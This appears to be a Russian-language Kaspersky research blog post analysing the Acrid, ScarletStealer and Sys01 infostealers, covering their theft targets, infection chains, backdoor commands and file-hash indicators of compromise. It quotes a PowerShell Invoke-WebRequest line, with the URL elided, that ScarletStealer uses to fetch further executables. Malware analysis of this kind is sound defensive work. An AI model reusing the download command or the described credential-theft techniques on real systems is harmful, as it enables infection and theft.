Введение
За прошлый год мы опубликовали ряд исследований, посвященных различным стилерам (см. здесь, здесь и здесь). Похоже, что тенденция к появлению новых и новых версий этого вредоносного ПО сохраняется: за последние месяцы мы подготовили еще несколько закрытых отчетов. В них мы описали, в частности, совсем новые стилеры Acrid и ScarletStealer, а также стилер Sys01, получивший значительное обновление с момента выхода последнего общедоступного анализа.
Если вы хотите узнать больше о нашем сервисе информирования о crimeware (вредоносном ПО, которое используется для совершения киберпреступлений), обращайтесь по адресу crimewareintel@kaspersky.com.
Acrid
Acrid — это новый стилер, обнаруженный в декабре прошлого года. Несмотря на название он не имеет ничего общего со стилером AcridRain. Acrid написан на C++ для 32-разрядных систем, хотя в наши дни большинство систем 64-разрядные. При внимательном изучении причина компиляции для 32-разрядной среды становится ясна: разработчик решил использовать технику Heaven’s Gate. Она позволяет 32-разрядным приложениям получать доступ к 64-разрядной среде, чтобы обойти определенные меры безопасности.
Функциональность стилера обычна для вредоносного ПО такого типа:
- кража данных браузера (файлы cookie, пароли, другие данные для входа в систему, данные банковских карт и так далее);
- кража локальных криптовалютных кошельков;
- кража файлов с определенными именами (wallet.dat, password.docx и так далее);
- кража учетных данных из установленных приложений (FTP-менеджеры, мессенджеры и другие).
Собранные данные архивируются и отправляются на командный сервер злоумышленников.
Уровень сложности стилера можно оценить как средний. В нем есть некоторые изощренные детали, вроде шифрования строк, но нет ничего инновационного.
ScarletStealer
В январе прошлого года мы изучали загрузчик, который мы назвали Penguish (и подробно описали в закрытом отчете). Одной из полезных нагрузок, которые он загружал, был ранее неизвестный стилер. Его мы назвали ScarletStealer.
Это довольно необычный стилер: большая часть его функциональности содержится в других бинарных файлах (приложениях и расширениях Chrome), которые он загружает. Если быть более точным: когда ScarletStealer запускается, он ищет криптовалюты и криптокошельки, проверяя определенные пути к папкам (например, %APPDATA%\Roaming\Exodus). Если стилер что-то нашел, он начинает загружать дополнительные исполняемые файлы с помощью следующей команды PowerShell:
1 2 |
powershell.exe -Command "Invoke-WebRequest -Uri 'https://.........exe' - OutFile $env:APPDATA\\.........exe |
Среди загружаемых им бинарных файлов — metaver_.exe (используется для кражи содержимого из расширений Chrome), meta.exe (модифицирует ярлык Chrome так, чтобы он запускался с вредоносным расширением) и другие. Большинство исполняемых файлов ScarletStealer имеют цифровую подпись.
Стилер очень слабо развит в плане функциональности и содержит множество ошибок, недоработок и избыточного кода. Например, он пытается закрепиться в системе, создавая раздел реестра для автозапуска. Этот раздел реестра содержит путь к файлу Runtimebroker_.exe, однако ни в одном из файлов стилера мы не нашли кода, в котором бы упоминался хоть один исполняемый файл с таким именем.
Поэтому довольно странно, что этот стилер распространяется через длинную цепочку загрузчиков (последний из которых — это Penguish) и подписан цифровым сертификатом. Можно было бы ожидать, что все эти усилия увенчаются загрузкой чего-то более продвинутого, чем ScarletStealer.
Жертвы этого стилера в основном находятся в Бразилии, Турции, Индонезии, Алжире, Египте, Индии, Вьетнаме, США, Южной Африке и Португалии.
Sys01
SYS01 (другие названия — Album Stealer, S1deload Stealer) — относительно малоизвестный стилер, существующий как минимум с 2022 года. Его уже описывали Bitdefender, Zscaler и Morphisec. В их отчетах можно проследить эволюцию от стилера на C# до стилера на PHP. Когда эту кампанию начали изучать мы, то заметили сочетание этих двух полезных нагрузок — на C# и на PHP.
Единственное, что не изменилось в новой версии стилера, — это вектор заражения. Как и раньше, пользователей обманом побуждают загрузить вредоносный ZIP-архив, замаскированный под видео для взрослых, через страницу на Facebook:
Архив содержит легитимный бинарный файл (в данном случае WdSyncservice.exe, переименованный в PlayVideoFull.exe), который загружает вредоносную библиотеку DLL с именем WDSync.dll. DLL открывает видео для взрослых и попутно запускает следующую полезную нагрузку, которая представляет собой вредоносный PHP-файл, закодированный с помощью ionCube.
Этот PHP-файл, в свою очередь, вызывает скрипт install.bat, а тот выполняет команду PowerShell, чтобы запустить следующий этап. Он называется runalayer и запускает то, что, видимо, и является финальной полезной нагрузкой, называемой Newb.
Однако между последней версией стилера и предыдущими публично раскрытыми версиями есть разница, которая заключается в разделенной функциональности. Стилер в его нынешнем виде (Newb) содержит функциональность для кражи данных, связанных с Facebook, и для отправки на командный сервер злоумышленников украденных данных браузера, которые размещены и организованы в определенной структуре каталога. Он также имеет функции бэкдора и может выполнять, среди прочих, следующие команды.
Команда | Описание |
dll | Загрузить файл, завершить все указанные процессы и запустить новый процесс с помощью PowerShell (команда расшифровывает, распаковывает и запускает указанный файл). Процедура PowerShell работает так же, как и в прошлых наблюдавшихся версиях. |
cmd | Завершить процессы из указанного списка и запустить новый процесс. |
dls | Загрузить файл, завершить все указанные процессы и запустить новый указанный процесс. |
Но код, который, собственно, собирает данные браузера, чтобы Newb отправил их на командный сервер злоумышленников, обнаружился в другом образце — imageclass. Изучив код бэкдора Newb, мы с большой долей уверенности считаем, что imageclass попадает в систему через него, хотя не можем определить это достоверно.
В исходном ZIP-архиве содержится еще один вредоносный PHP-файл — include.php. Этот файл имеет схожую с Newb функциональность бэкдора и принимает многие из его команды и в том же формате.
Жертвы этой кампании были найдены по всему миру, но большинство из них — в Алжире (чуть более 15%). Скорее всего, это связано с вектором заражения: он может быть сильно локализованным. Мы также заметили, что разработчики вредоносной программы отдают предпочтение доменам верхнего уровня .top.
Заключение
Стилеры — это реальная и по-прежнему актуальная угроза. В этой статье мы рассмотрели эволюцию известного стилера, а также два совершенно новых стилера разных уровней сложности. Тот факт, что новые программы этого типа продолжают появляться, причем с разной сложностью и функциональностью, говорит о том, что на преступном рынке существует на них спрос.
Стилеры опасны своими последствиями. Эти программы похищают пароли и другую конфиденциальную информацию, которая впоследствии может быть использована в других вредоносных целях, а это приводит как минимум к большим финансовым потерям. Чтобы защитить себя от стилеров и других угроз, важно соблюдать несколько основных правил кибергигиены: всегда устанавливайте последние патчи безопасности на свое программное обеспечение, не скачивайте файлы из сомнительных источников и не открывайте вложения в сомнительных письмах. Для большей уверенности можно установить защитное решение, которое отслеживает события на вашем компьютере, например наш компонент SystemWatcher.
Если вы хотите получать свежую информацию о новейших тактиках, методах и процедурах злоумышленников или задать вопрос о наших закрытых отчетах, пишите по адресу crimewareintel@kaspersky.com.
Индикаторы компрометации
Acrid
abceb35cf20f22fd8a6569a876e702cb
2b71c81c48625099b18922ff7bebbf51
b9b83de1998ebadc101ed90a6c312da8
ScarletStealer
1d3c3869d682fbd0ae3151b419984771
c0cf3d6d40a3038966f2a4f5bfe2b7a7
f8b2b941cffb9709ce8f422f193696a0
Sys01
0x6e2b16cc41de627eb7ddcd468a037761
0x21df3a69540c6618cfbdaf84fc71031c
0x23ae473bc44fa49b1b221150e0166199
Стилеры, стилеры и еще раз стилеры